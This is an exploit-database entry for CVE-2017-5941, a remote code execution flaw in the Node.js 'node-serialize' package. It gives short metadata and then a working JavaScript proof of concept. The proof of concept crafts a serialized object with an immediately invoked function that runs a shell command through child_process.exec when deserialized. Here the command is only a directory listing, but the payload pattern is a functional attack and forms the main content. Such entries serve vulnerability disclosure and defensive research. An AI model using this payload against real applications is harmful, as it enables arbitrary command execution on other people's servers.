EXPLOITS

Node.JS - 'node-serialize' Remote Code Execution

Author: OpSecX
type: remote
platform: linux
port: 
date_added: 2018-08-27  
date_updated: 2018-08-27  
verified: 0  
codes: CVE-2017-5941  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 45265.js  

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);